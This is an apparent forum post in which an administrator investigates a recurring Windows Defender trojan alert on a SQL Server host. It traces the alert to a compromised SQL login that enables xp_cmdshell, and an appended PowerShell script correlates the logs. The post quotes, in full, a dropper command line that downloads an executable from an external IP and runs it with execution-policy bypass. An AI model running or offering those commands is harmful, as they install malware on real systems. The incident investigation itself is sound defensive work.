How to find the process that is running PowerShell commands that appear in Windows Defender
On one of our Windows Server 2016 Datacenter machines, there's an alert that a trojan is trying to install:
The following commands try to execute at seemingly random hours of the day (always during working hours, once or twice a day; sometimes there are a few days between attempts, which makes me think it's embedded in a file that is executed by the users of the machine):
CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, %TEMP%\tzt.exe) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create %TEMP%\tzt.exe
CmdLine:C:\Windows\System32\cmd.exe /C echo $cl = New-Object System.Net.WebClient >C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & echo $cl.DownloadFile(http://80.66.75.36/p-Eehpf.exe, C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe) >> C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & powershell -ExecutionPolicy Bypass C:\Users\MSSQL$SAGE100\AppData\Local\Temp\updt.ps1 & WMIC process call create C:\Users\MSSQL$SAGE100\AppData\Local\Temp\tzt.exe
So I suppose it's embedded in some other file, or comes through a network attack, but I don't know how to investigate this to find out which service/file is at fault.
Edit:
I checked the Event Viewer System log: the times of the Windows Defender detections coincide with the AppX Deployment Service starting:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Service Control Manager" Guid="{xxx-a6d7-4695-8e1e-xxx012f4}" EventSourceName="Service Control Manager" />
    <EventID Qualifiers="16384">7036</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>0</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8080000000000000</Keywords>
    <TimeCreated SystemTime="2023-03-03T13:36:51.390130000Z" />
    <EventRecordID>685207</EventRecordID>
    <Correlation />
    <Execution ProcessID="708" ThreadID="13796" />
    <Channel>System</Channel>
    <Computer>xxxx</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="param1">AppX Deployment Service (AppXSVC)</Data>
    <Data Name="param2">running</Data>
    <Binary>4100700070005800xx4000000</Binary>
  </EventData>
</Event>
In Event Viewer > Windows Logs > Application I found that the following values are changed at the time Windows Defender is triggered:
- TRUSTWORTHY new value ON for database msdb
- 'clr enabled' new value: 1
- 'show advanced options' new value: 1
- 'xp_cmdshell' new value: 1
coming from user MSSQL$SAGE100, which is the SQL Server system user.
So I suppose the user has been compromised and is used to issue PowerShell commands to the VM. I have enabled logging of successful logins on the SQL Server to see if the commands are issued through an application or directly from the network.
After another attack yesterday, I can confirm that someone is logging in from outside with the correct credentials for a SQL user of my SQL Server and uses this user to conduct the attack.
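As an added example, not part of the original post: a PowerShell script that does the correlation described above from the event logs, so that each Defender detection is lined up with the SQL Server configuration changes, logins and process creations that happened around it. The instance name MSSQL$SAGE100 and the dropper file names (updt.ps1, tzt.exe) are taken from the post; the assumption that Security event 4688 (process creation) auditing with command-line capture is enabled is mine, the post does not say so. With that audit in place, the 4688 record for the cmd.exe that writes updt.ps1 carries a Creator Process Name field, which answers the question in the title directly: if xp_cmdshell is the vector, that field will be the sqlservr.exe of the SAGE100 instance.

```powershell
# Added example, not from the original post.
# Assumptions: SQL instance source name MSSQL$SAGE100 (from the post);
# Security log 4688 auditing with "Include command line in process creation events"
# enabled (assumed, not stated in the post).
param(
    [int]$WindowSeconds = 120,
    [string]$SqlSource   = 'MSSQL$SAGE100'
)

# 1. Defender detections: 1116 = malware detected, 1117 = action taken.
$detections = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 1116, 1117
} -ErrorAction SilentlyContinue

foreach ($d in $detections) {
    $from = $d.TimeCreated.AddSeconds(-$WindowSeconds)
    $to   = $d.TimeCreated.AddSeconds($WindowSeconds)
    "=== Defender detection at $($d.TimeCreated) (Event $($d.Id)) ==="

    # 2. SQL Server events from the same window:
    #    15457 = configuration option changed ('show advanced options', 'xp_cmdshell', 'clr enabled')
    #    5084  = database option changed (TRUSTWORTHY on msdb)
    #    18453/18454 = successful Windows/SQL login (only logged once login auditing is on)
    #    18456 = failed login
    Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = $SqlSource
        StartTime    = $from
        EndTime      = $to
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -in 15457, 5084, 18453, 18454, 18456 } |
        ForEach-Object { '  [SQL {0}] {1} {2}' -f $_.Id, $_.TimeCreated, ($_.Message -replace '\s+', ' ') }

    # 3. Process creations in the window whose command line matches the dropper.
    #    ParentProcessName (Creator Process Name) tells you which process spawned cmd.exe.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4688
        StartTime = $from
        EndTime   = $to
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'updt\.ps1|tzt\.exe' } |
        ForEach-Object {
            $x    = [xml]$_.ToXml()
            $data = @{}
            foreach ($n in $x.Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
            "  [4688] {0} parent={1} new={2}`n         cmd={3}" -f $_.TimeCreated,
                $data['ParentProcessName'], $data['NewProcessName'], $data['CommandLine']
        }
}
```

Run it in an elevated PowerShell on the server (the Security log needs administrator rights). If step 3 prints nothing, command-line auditing was not on at the time of the detections; enabling it (Audit Process Creation plus the "Include command line in process creation events" policy) will capture the next attempt. The 18453/18454 login events in step 2 carry the client IP in their message text, which is what distinguishes a network login from an application on the box.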